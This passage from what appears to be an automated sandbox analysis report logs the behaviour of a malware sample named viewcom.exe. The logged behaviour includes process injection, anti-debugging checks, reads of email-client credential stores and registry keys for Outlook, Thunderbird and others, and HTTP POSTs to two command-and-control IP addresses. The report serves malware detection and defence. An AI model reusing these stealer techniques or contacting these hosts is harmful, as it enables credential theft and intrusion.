Allocate	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736	1	Fn
Allocate	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 102400	1	Fn
Get Info	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"	address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096	1	Fn
Get Info	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"	address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096	1	Fn
Get Info	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"	address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096	1	Fn
Protect	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"	address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 114688	1	Fn
Protect	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"	address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 372736	1	Fn
Protect	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"	address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 102400	1	Fn
Write	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"	address = 0x400000, size = 114688	1	Fn Data
Write	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"	address = 0x7ffdd008, size = 4	1	Fn Data
Write	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"	address = 0x400000, size = 372736	1	Fn Data
Write	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"	address = 0x7ffd8008, size = 4	1	Fn Data
Write	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"	address = 0x400000, size = 102400	1	Fn Data
Write	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"	address = 0x7ffda008, size = 4	1	Fn Data

Module (101)

Operation	Module	Additional Information	Count	Logfile
Load	ntdll.dll	base_address = 0x775c0000	1	Fn
Load	KERNEL32.dll	base_address = 0x76350000	2	Fn
Load	ADVAPI32.dll	base_address = 0x76030000	1	Fn
Load	SHLWAPI.dll	base_address = 0x760e0000	1	Fn
Load	winhttp.dll	base_address = 0x6f600000	7	Fn
Load	urlmon.dll	base_address = 0x75ce0000	11	Fn
Load	wininet.dll	base_address = 0x771e0000	11	Fn
Load	advapi32.dll	base_address = 0x76030000	5	Fn
Load	ole32.dll	base_address = 0x77460000	1	Fn
Load	shell32.dll	base_address = 0x764f0000	4	Fn
Load	crypt32.dll	base_address = 0x757b0000	4	Fn
Load	userenv.dll	base_address = 0x74dc0000	5	Fn
Load	wtsapi32.dll	base_address = 0x741a0000	5	Fn
Load	mpr.dll	base_address = 0x70f40000	1	Fn
Load	netapi32.dll	base_address = 0x73eb0000	1	Fn
Load	SAMCLI.DLL	base_address = 0x73800000	1	Fn
Get Handle	c:\users\atveyd~1\appdata\local\temp\38763.exe	base_address = 0x400000	1	Fn
Get Filename	c:\users\atveyd~1\appdata\local\temp\38763.exe	process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 259	1	Fn
Get Filename		process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260	7	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd10	1	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd50	1	Fn
Get Address		function = LoadLibraryA, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = GetProcAddress, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = VirtualProtect, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = cos, address_out = 0x77607400	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = sin, address_out = 0x775f41c0	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = strchr, address_out = 0x77607690	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LoadLibraryA, address_out = 0x763a395c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = lstrcmpA, address_out = 0x76388c59	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateFileA, address_out = 0x7639cee8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x7639ca7c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleHandleA, address_out = 0x7639cf41	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleFileNameA, address_out = 0x763a33f6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetComputerNameA, address_out = 0x76386ba9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetComputerNameExA, address_out = 0x763df41f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCommandLineA, address_out = 0x763a98ff	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FreeConsole, address_out = 0x763fbfde	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualAlloc, address_out = 0x763a2fb6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76393ea8	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetUserNameA, address_out = 0x7605a4b4	1	Fn
Get Address	c:\windows\system32\shlwapi.dll	function = StrStrIA, address_out = 0x760ed250	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WTSGetActiveConsoleSessionId, address_out = 0x7638480b	1	Fn
Create Mapping	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe	filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Create Mapping	C:\ProgramData\9F1B.tmp	filename = C:\ProgramData\9F1B.tmp, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Map	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe	process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, desired_access = FILE_MAP_READ	1	Fn
Map	C:\ProgramData\9F1B.tmp	process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, desired_access = FILE_MAP_READ	1	Fn

Service (1)

Operation	Additional Information	Success	Count	Logfile
Open Manager	database_name = SERVICES_ACTIVE_DATABASE		1	Fn

System (7)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = ZJEWV7F	3	Fn
Get Computer Name	result_out = ZjEwV7f, type = ComputerNameDnsHostname	1	Fn
Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn
Get Info	type = Operating System	1	Fn
Get Info	type = Hardware Information	1	Fn

Mutex (4)

Operation	Additional Information	Count	Logfile
Create	mutex_name = M68B1B0D0	1	Fn
Create	mutex_name = Global\I40F77A1B	1	Fn
Create	mutex_name = Global\M40F77A1B	1	Fn
Release	mutex_name = Global\I40F77A1B	1	Fn

Debug (498)

Operation	Process	Additional Information	Success	Count	Logfile
Check for Presence	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe			498	Fn

Network Behavior

HTTP Sessions (3)

Information	Value
Total Data Sent	0.95 KB (972 bytes)
Total Data Received	425.10 KB (435300 bytes)
Contacted Host Count	2
Contacted Hosts	65.99.230.27, 185.82.23.28

HTTP Session #1

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	65.99.230.27
Server Port	443
Data Sent	0.32 KB (324 bytes)
Data Received	424.79 KB (434988 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = 65.99.230.27, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 65.99.230.27	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4	1	Fn Data
Read Response	size = 434980, size_out = 434980	1	Fn Data
Read Response	size = 0, size_out = 0	1	Fn
Close Session		3	Fn

HTTP Session #2

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	65.99.230.27
Server Port	443
Data Sent	0.32 KB (324 bytes)
Data Received	0.15 KB (156 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = 65.99.230.27, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 65.99.230.27	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4	1	Fn Data
Read Response	size = 148, size_out = 148	1	Fn Data
Read Response	size = 0, size_out = 0	1	Fn
Close Session		3	Fn

HTTP Session #3

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	185.82.23.28
Server Port	443
Data Sent	0.32 KB (324 bytes)
Data Received	0.15 KB (156 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = 185.82.23.28, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 185.82.23.28	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4	1	Fn Data
Read Response	size = 148, size_out = 148	1	Fn Data
Read Response	size = 0, size_out = 0	1	Fn
Close Session		3	Fn

Process #8: viewcom.exe

(Host: 179, Network: 0)

Information	Value
ID	#8
File Name	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe
Command Line	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"
Initial Working Directory	C:\Users\ATVeyDl98Z\Desktop\
Monitor	Start Time: 00:01:18, Reason: Child Process
Unmonitor	End Time: 00:02:34, Reason: Terminated by Timeout
Monitor Duration	00:01:16

OS Process Information

Information	Value
PID	0xc70
Parent PID	0xb98 (c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	ZJEWV7F\ATVeyDl98Z
Groups	ZJEWV7F\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f73d (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x C74 0x CBC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00140000	0x001a6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000001b0000	0x001b0000	0x001b0fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001c0000	0x001c0000	0x001c0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000240000	0x00240000	0x0024ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000250000	0x00250000	0x0034ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000400000	0x00400000	0x0041bfff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000420000	0x00420000	0x004e7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000004f0000	0x004f0000	0x005f0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000600000	0x00600000	0x011fffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001200000	0x01200000	0x012fffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01300000	0x015cefff	Memory Mapped File	Readable	Region Actions
private_0x00000000015d0000	0x015d0000	0x016cffff	Private Memory	Readable, Writable	Region Actions Download Dump
comctl32.dll	0x723c0000	0x72443fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pstorec.dll	0x72810000	0x7281cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x741e0000	0x741f3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75640000	0x7565afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x75780000	0x7578bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x757b0000	0x758ccfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x758d0000	0x75919fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75a70000	0x75b0cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75b10000	0x75b19fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75b60000	0x75c00fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75c10000	0x75cd8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76030000	0x760cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x760e0000	0x76136fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x76330000	0x76348fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76350000	0x76423fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x764f0000	0x77139fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77140000	0x7715efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comdlg32.dll	0x77160000	0x771dafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x772e0000	0x773abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x773b0000	0x7745bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x77460000	0x775bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x775c0000	0x776fbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x77710000	0x7775dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77800000	0x77800fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	0xc48	address = 0x400000, size = 114688	1	Fn Data
Modify Memory	#6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	0xc48	address = 0x7ffdd008, size = 4	1	Fn Data
Modify Control Flow	#6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	0xc48	os_tid = 0xc74, address = 0x0	1	Fn

Host Behavior

File (40)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\ProgramData\9F1B.tmp	desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom_lng.ini	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Profiles	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Thunderbird\Profiles	type = file_attributes	1	Fn
Get Info	C:\Program Files\Mozilla Thunderbird	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount	type = size	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount	type = size	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount	type = size	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount	size = 1506, size_out = 1506	1	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount	size = 1734, size_out = 1734	1	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows Mail\account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount	size = 670, size_out = 670	1	Fn Data
Write	C:\ProgramData\9F1B.tmp	size = 6	1	Fn Data
Write	C:\ProgramData\9F1B.tmp	size = 1	12	Fn Data
Write	C:\ProgramData\9F1B.tmp	size = 12	1	Fn Data
Write	C:\ProgramData\9F1B.tmp	size = 15	2	Fn Data
Write	C:\ProgramData\9F1B.tmp	size = 5	1	Fn Data
Write	C:\ProgramData\9F1B.tmp	size = 0	4	Fn
Write	C:\ProgramData\9F1B.tmp	size = 2	2	Fn Data
Write	C:\ProgramData\9F1B.tmp	size = 4	2	Fn Data
Write	C:\ProgramData\9F1B.tmp	size = 7	1	Fn Data

Registry (97)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts		1	Fn
Open Key	HKEY_CURRENT_USER\Identities		1	Fn
Open Key	HKEY_CURRENT_USER\Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}		1	Fn
Open Key	HKEY_CURRENT_USER\Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\Software\Microsoft\Internet Account Manager\Accounts		1	Fn
Open Key	HKEY_CURRENT_USER\Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\21c3340121c69b4d9839e87233c43775		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5820efc9fdbb5f47849ddf6d61a8efbf		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5822179f3ba9dd4b834ca5b688df58ee		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5cf6dc56389a514da4af66e8d249d682		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\79245ba6aebb494e8474990b23b0b5d9		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\822186790bcca847a772607001697335		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b76d3b10d1949342bbbb36b682c4ceca		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001		1	Fn
Open Key	HKEY_CURRENT_USER\Software\IncrediMail\Identities		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Group Mail		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\MessengerService		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Yahoo\Pager		1	Fn
